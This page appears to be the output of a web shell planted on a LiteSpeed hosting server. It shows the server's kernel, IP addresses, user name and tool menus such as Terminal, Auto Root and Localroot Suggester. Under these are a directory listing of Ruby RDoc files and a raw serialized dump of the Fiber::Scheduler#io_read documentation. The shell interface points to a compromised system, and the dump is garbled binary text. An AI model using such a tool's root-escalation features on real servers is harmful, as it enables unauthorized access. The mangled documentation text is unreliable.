Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Fiber /
Scheduler /
Delete
Unzip
Name
Size
Permission
Date
Action
address_resolve-i.ri
1.62
KB
-rw-r--r--
2026-04-07 17:42
block-i.ri
779
B
-rw-r--r--
2026-04-07 17:42
cdesc-Scheduler.ri
3.43
KB
-rw-r--r--
2026-04-07 17:42
close-i.ri
556
B
-rw-r--r--
2026-04-07 17:42
fiber-i.ri
722
B
-rw-r--r--
2026-04-07 17:42
io_pread-i.ri
446
B
-rw-r--r--
2026-04-07 17:42
io_pwrite-i.ri
453
B
-rw-r--r--
2026-04-07 17:42
io_read-i.ri
1.42
KB
-rw-r--r--
2026-04-07 17:42
io_select-i.ri
591
B
-rw-r--r--
2026-04-07 17:42
io_wait-i.ri
1019
B
-rw-r--r--
2026-04-07 17:42
io_write-i.ri
1.49
KB
-rw-r--r--
2026-04-07 17:42
kernel_sleep-i.ri
676
B
-rw-r--r--
2026-04-07 17:42
process_wait-i.ri
866
B
-rw-r--r--
2026-04-07 17:42
timeout_after-i.ri
1.71
KB
-rw-r--r--
2026-04-07 17:42
unblock-i.ri
765
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::AnyMethod[iI"io_read:ETI"Fiber::Scheduler#io_read;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"RInvoked by IO#read or IO#Buffer.read to read +length+ bytes from +io+ into a ;TI")specified +buffer+ (see IO::Buffer).;To:RDoc::Markup::BlankLine o; ; [ I"QThe +minimum_length+ argument is the "minimum length to be read". If the IO ;TI"Qbuffer size is 8KiB, but the +length+ is +1024+ (1KiB), up to 8KiB might be ;TI"Oread, but at least 1KiB will be. Generally, the only case where less data ;TI"Ithan +length+ will be read is if there is an error reading the data.;T@o; ; [I"QSpecifying a +length+ of 0 is valid and means try reading at least once and ;TI"return any available data.;T@o; ; [I"MSuggested implementation should try to read from +io+ in a non-blocking ;TI"Qmanner and call #io_wait if the +io+ is not ready (which will yield control ;TI"to other fibers).;T@o; ; [I">See IO::Buffer for an interface available to return data.;T@o; ; [I"GExpected to return number of bytes read, or, in case of an error, ;TI"K<tt>-errno</tt> (negated number corresponding to system's error code).;T@o; ; [I"4The method should be considered _experimental_.;T: @fileI"scheduler.c;T:0@omit_headings_from_table_of_contents_below0I"Bio_read(io, buffer, minimum_length) -> read length or -errno ;T0[ I"(p1, p2, p3, p4);T@)FI"Scheduler;TcRDoc::NormalClass00